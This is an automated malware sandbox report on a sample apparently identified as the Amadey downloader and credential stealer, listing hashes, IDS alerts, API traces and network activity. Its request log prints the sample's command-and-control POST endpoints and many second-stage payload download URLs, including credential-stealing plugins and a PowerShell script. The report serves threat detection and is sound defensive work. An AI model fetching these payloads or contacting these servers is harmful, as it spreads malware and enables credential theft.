popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

AAAd.exe

Emotet HermeticWiper Gen1 Browser Login Data Stealer Generic Malware UPX Downloader Antivirus Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) DGA HTTP Escalate priviledges PWS Http API Internet API Anti_VM Socket
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 June 26, 2023, 7:42 a.m. June 26, 2023, 8:01 a.m.
Size 231.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3dd072d71907f6d5a5b046908c081f11
SHA256 1783a69593b72237fce4111d231ab3c919f9220e8baf8b2216c488d4dbedcdf1
CRC32 B56E2FEE
ssdeep 6144:0s9bFCavQJdMSzPgI0KIikB/NiFEZu7dRmV:pbFCRMcRIiTFgu7dR
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • Malicious_Packer_Zero - Malicious Packer
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
gejevesd.beget.tech
A 91.106.207.112
91.106.207.112
apps.identrust.com
A 121.254.136.27
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
23.67.53.18
foryourbar.org
A 172.67.205.237
A 104.21.22.166
172.67.205.237
galandskiyher2.com
A 194.50.153.68
194.50.153.68
wdl1.pcfg.cache.wpscdn.com
CNAME wdl1.pcfg.cache.wpscdn.com.b.galileo.jcloud-cdn.com
CNAME iduzw1u.qiniudns.com
CNAME wdl1.pcfg.cache.wpscdn.com.cdn.jcloudcdn.com
A 104.17.188.189
A 104.17.187.189
CNAME large023.oversea.line.qiniudns.com
104.17.188.189
sungeomatics.com
A 205.134.251.88
205.134.251.88
IP Address Status Action
104.17.187.189 Active Moloch
109.206.241.33 Active Moloch
121.254.136.27 Active Moloch
164.124.101.2 Active Moloch
172.67.205.237 Active Moloch
194.50.153.68 Active Moloch
195.123.226.82 Active Moloch
205.134.251.88 Active Moloch
79.137.192.3 Active Moloch
85.217.144.143 Active Moloch
85.217.144.228 Active Moloch
91.106.207.112 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49172 -> 109.206.241.33:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 109.206.241.33:80 2045751 ET MALWARE Win32/Amadey Bot Activity (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49174 -> 85.217.144.228:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 194.50.153.68:80 -> 192.168.56.101:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.50.153.68:80 -> 192.168.56.101:49178 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 85.217.144.143:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 85.217.144.228:80 -> 192.168.56.101:49174 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 85.217.144.143:80 -> 192.168.56.101:49188 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.101:49188 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49188 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49173 -> 109.206.241.33:80 2044597 ET MALWARE Amadey Bot Activity (POST) M1 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49182 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49193 -> 104.17.187.189:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49856 -> 172.67.205.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49381 -> 172.67.205.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49855 -> 205.134.251.88:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49857 -> 172.67.205.237:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49862 -> 91.106.207.112:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 91.106.207.112:80 -> 192.168.56.101:49862 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 91.106.207.112:80 -> 192.168.56.101:49862 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49859 -> 109.206.241.33:80 2044623 ET MALWARE Amadey Bot Activity (POST) A Network Trojan was detected
TCP 192.168.56.101:49859 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49879 -> 85.217.144.143:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.101:49879 -> 85.217.144.143:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2014819 ET INFO Packed Executable Download Misc activity
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 85.217.144.143:80 -> 192.168.56.101:49879 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 109.206.241.33:80 -> 192.168.56.101:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 109.206.241.33:80 -> 192.168.56.101:49177 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.101:49875 -> 79.137.192.3:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 79.137.192.3:80 -> 192.168.56.101:49875 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 79.137.192.3:80 -> 192.168.56.101:49875 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 79.137.192.3:80 -> 192.168.56.101:49875 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 109.206.241.33:80 2044696 ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 A Network Trojan was detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49185
205.134.251.88:443 		C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=sungeomatics.com a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd
TLSv1
192.168.56.101:49182
205.134.251.88:443 		C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=sungeomatics.com a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd
TLSv1
192.168.56.101:49193
104.17.187.189:443 		C=US, O=DigiCert, Inc., CN=RapidSSL Global TLS RSA4096 SHA256 2022 CA1 CN=wdl1.pcfg.cache.wpscdn.com 31:de:33:8a:83:3d:ab:45:d7:5d:69:e1:ed:3d:4f:a8:e4:8b:12:34
TLSv1
192.168.56.101:49856
172.67.205.237:443 		C=US, O=Let's Encrypt, CN=E1 CN=foryourbar.org d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18
TLSv1
192.168.56.101:49381
172.67.205.237:443 		C=US, O=Let's Encrypt, CN=E1 CN=foryourbar.org d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18
TLSv1
192.168.56.101:49855
205.134.251.88:443 		C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority CN=sungeomatics.com a0:ec:67:00:fb:27:e3:a7:94:66:83:e9:db:7f:bd:5a:f4:c6:ad:cd
TLSv1
192.168.56.101:49857
172.67.205.237:443 		C=US, O=Let's Encrypt, CN=E1 CN=foryourbar.org d7:f1:86:9f:28:fa:5d:6c:4b:c7:e5:44:05:c2:45:df:03:de:c9:18

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "jbruyer.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\73456c80a6\jbruyer.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000239390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd340
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bce70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd7a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd7a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd7a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bd570
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002bddc0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ada70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ada70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ada70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ae950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002ae950
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000201f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000201f30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000202a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000202a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000202a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb040
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8eb0b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebb30
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b8ebf20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
Save+0x8d973 Main-0x1478d cred64+0x91e43 @ 0x7feef391e43
Save+0x8f58b Main-0x12b75 cred64+0x93a5b @ 0x7feef393a5b
Save+0x90613 Main-0x11aed cred64+0x94ae3 @ 0x7feef394ae3
Save+0x909bf Main-0x11741 cred64+0x94e8f @ 0x7feef394e8f
Save+0xa1ae8 Main-0x618 cred64+0xa5fb8 @ 0x7feef3a5fb8
Main+0x65 cred64+0xa6635 @ 0x7feef3a6635
rundll32+0x2f42 @ 0xffb92f42
rundll32+0x3b7a @ 0xffb93b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d973 Main-0x1478d cred64+0x91e43
exception.address: 0x7feef391e43
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 24
registers.rbx: 0
registers.rsp: 2424800
registers.r11: 2419696
registers.r8: 0
registers.r9: 249120620554
registers.rdx: 3453616
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0

__exception__

 stacktrace: 
RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895
stacktrace+0x84 memdup-0x1af @ 0x73980470
hook_in_monitor+0x45 lde-0x133 @ 0x739742ea
New_ntdll_RtlAddVectoredExceptionHandler+0x20 New_ntdll_RtlCompressBuffer-0xed @ 0x73996340
0x920ee
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1
0x1

exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29
exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895
exception.address: 0x76d80895
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 329877
registers.r14: 0
registers.r15: 0
registers.rcx: 1437720
registers.rsi: 20
registers.r10: 0
registers.rbx: 1
registers.rsp: 1439744
registers.r11: 596580
registers.r8: 64
registers.r9: 4287995904
registers.rdx: 1439064
registers.r12: 599640
registers.rbp: 4287995904
registers.rdi: 4287696912
registers.rax: 1437400
registers.r13: 591256
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://109.206.241.33/9bDc8sQ/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://109.206.241.33/9bDc8sQ/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.228/files/AAAd1.exe
suspicious_features GET method with no useragent header suspicious_request GET http://galandskiyher2.com/downloads/toolspub1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.143/files/setup.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.206.241.33/9bDc8sQ/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://109.206.241.33/9bDc8sQ/Plugins/clip64.dll
suspicious_features GET method with no useragent header suspicious_request GET http://gejevesd.beget.tech/385118/setup.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://79.137.192.3/staticlittlesource.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://85.217.144.143/files/My2.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/postmon.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/dd_64.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc4.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc5.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc1.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc2.php
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/cc3.php
suspicious_features GET method with no useragent header suspicious_request GET https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/download/11.2.0.11537/300.910/WPSOffice_11.2.0.11537.exe
suspicious_features GET method with no useragent header suspicious_request GET https://sungeomatics.com/css/colors/debug2.ps1
request POST http://109.206.241.33/9bDc8sQ/index.php
request POST http://109.206.241.33/9bDc8sQ/index.php?scr=1
request GET http://85.217.144.228/files/AAAd1.exe
request GET http://galandskiyher2.com/downloads/toolspub1.exe
request GET http://85.217.144.143/files/setup.exe
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://109.206.241.33/9bDc8sQ/Plugins/cred64.dll
request GET http://109.206.241.33/9bDc8sQ/Plugins/clip64.dll
request GET http://gejevesd.beget.tech/385118/setup.exe
request GET http://195.123.226.82/index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM
request GET http://79.137.192.3/staticlittlesource.exe
request GET http://85.217.144.143/files/My2.exe
request GET https://sungeomatics.com/css/colors/postmon.exe
request GET https://sungeomatics.com/css/colors/dd_64.exe
request GET https://sungeomatics.com/css/colors/cc2.exe
request GET https://sungeomatics.com/css/colors/cc3.exe
request GET https://sungeomatics.com/css/colors/cc4.exe
request GET https://sungeomatics.com/css/colors/cc5.exe
request GET https://sungeomatics.com/css/colors/cc1.php
request GET https://sungeomatics.com/css/colors/cc2.php
request GET https://sungeomatics.com/css/colors/cc3.php
request GET https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/download/11.2.0.11537/300.910/WPSOffice_11.2.0.11537.exe
request GET https://sungeomatics.com/css/colors/debug2.ps1
request POST http://109.206.241.33/9bDc8sQ/index.php
request POST http://109.206.241.33/9bDc8sQ/index.php?scr=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
